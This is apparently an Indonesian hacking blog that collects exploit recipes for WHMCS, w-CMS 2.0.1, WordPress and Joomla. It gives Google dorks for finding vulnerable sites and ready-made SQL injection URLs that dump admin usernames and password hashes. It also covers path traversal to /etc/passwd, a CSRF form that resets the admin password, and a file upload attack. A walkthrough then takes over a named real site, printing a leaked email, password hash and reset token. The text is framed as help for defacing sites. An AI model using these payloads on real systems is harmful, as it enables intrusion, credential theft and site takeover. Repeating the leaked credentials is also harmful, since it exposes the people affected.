WHMCS Vulnerable

#=Info=======================================================================#

# Software: WHMCS control (WHMCompleteSolution)  Sql Injection                                                #

#                                                                                                                                       #

# Vulnerability: Remote Sql Injection                                                                                         #

# Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS

#=Sql Injection ===========================================================================================================================================================#

# Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20

# DOWNLOAD : http://www.whmcs.com/

# Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20

#=========================================================================================================================================================================#

 Dork :inurl:"weblink_cat_list.php?bcat_id="
**************************************************************************/

[ Vulnerable File ]

http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]

[ Exploit ]

http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user

[  GReets ]
Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

w-CMS 2.0.1 Multiple Vulnerabilities

w-CMS 2.0.1 Multiple Vulnerabilities
PoC/Exploit:

1.# Local File Disclosure [LFD]

~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password

+----------------------------------------------------------------------+

2.# Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php

Just Fill The Text Area With Evil Code (Php) & Click Save

+----------------------------------------------------------------------+

3.# Cross Site Scripting (XSS)

~ [PoC]Http://[victim]/path/?p= <h1>TEST</h1>
~ [PoC]Http://[victim]/path/index.php?p=<h1>TEST</h1>

+----------------------------------------------------------------------+

4.# Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle : <H3>Own3d</H3>
++ You Can Inject Xss Too
Exapmle : <script>alert('Dz0')</script>

+----------------------------------------------------------------------+

5.# Cross Site Request Forgny (CSRF) Admin Change Pass


~ [PoC] Inject This Evil Code In Contact Form
<br /> <br /> <head><br /> <title>Test</title><br /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><br /> <br /> <SCRIPT LANGUAGE="JavaScript"><!-- setTimeout('document.test.submit()',0); //--></SCRIPT><br /> <br /> </head><br /> <br /> <br /> <form name="test" id="form1" method="post" action="http://localhost/wcms-2.01/admin.php?settings=password"><!-- Target Site --><br /> <p> <input name="password1" type="text" value="dz0" /><!-- New Password --><br /> <input name="password2" type="text" value="dz0"/><!-- Confirm Password --><br /> </p> <p><input type="submit" name="Change" value="Change" /><br /> </p></form><br />

+----------------------------------------------------------------------+

6.# Arbitary File Upload
~ [PoC]Http://[victim]/admin.php

# Add Folder <br /> <form action='Http://[victim]/path/admin.php' method='post'><input type='hidden' name='files' value='folders' /><h2> Update Folders</h2><div class='left'> Folder Name</div> <div class='right'> <input name='newfolder' value='' /><br /><input style='width: auto;' class='button' type='submit' value='Add' /></form>


# Upload File
<br /> <form class='P10' action='Http://[victim]/admin.php' method='post' enctype='multipart/form-data'><input type='hidden' name='files' value='upload' /><br /> <h2>Upload Files</h2><p><b>Folder:</b> <select name='folder'><option value='Dz'>Dz</option></p><p><div id='settings'><div class='left'><p>Files</p> <br /> </div><div class='right'><input type='file' name='file[]' class='multi' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' /><div class='MultiFile-wrap' id='MultiFile5_wrap'><input style='position: absolute; top: -3000px;' name='' class='multi MultiFile-applied' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' type='file' /><div class='MultiFile-list' id='MultiFile5_wrap_list'></div><div class='MultiFile-label'><input style='width: auto;' class='button' type='submit' value='Upload' /><br /> </div></div></form>

Exploit Wordpress With upload-form.php

Lagi lagi Deface. Kenapa sich pada doyan deface.
Kali ini ane mau Shared cara Deface Wordpress dengan EXPLOIT WORDPRESS
Langsung aja di Cobain Exploit Wordpress nya.
di jamin Yahuud...


Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
Hasilnya di  /wp-content/uploads/2012/04/hasil.txt


Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Joomla Exploit

targetnya
cari di google
pake dork ini

inurl:"option com_artforms"

jangan malas mencari -_- di google :D

kita dapat target yaitu :

http://www.avaclean.com/

di exploid
ni kodenya di paste ke target tadi

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


ntar jadi nya kyak gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

disitu udah kelihatan emailnya

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

nah open tab lagi ya kk mastah :)

terus
copy code reset pass ini

/index.php?option=com_user&view=reset

terus masukin kode reset paswordnya  menjadi seperti ini :

http://www.avaclean.com//index.php?option=com_user&view=reset

setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadi
yaitu

josh@bkmediagroup.com

setelah di enter
anda disuruh masukin code :

kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi

open tab lagi neh untuk ngambil token nya :)

masukan code ini :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

ntar jadi nya gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

code nya :

admineda7d6142fac40a533b56407a4617371

nah kita kembali ke halaman reset tadi

kita masukin aja token yang ini

eda7d6142fac40a533b56407a4617371

truss enter :)) eehhh minta password baru dech dia :D

uppzzzzz kita masukin aja dech password kita :))

setelah udah masukin

kita masuk ke halaman admin nya

contoh :

http://sitetarget.com/administrator

nah masukin user nya :) & password kita :D

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini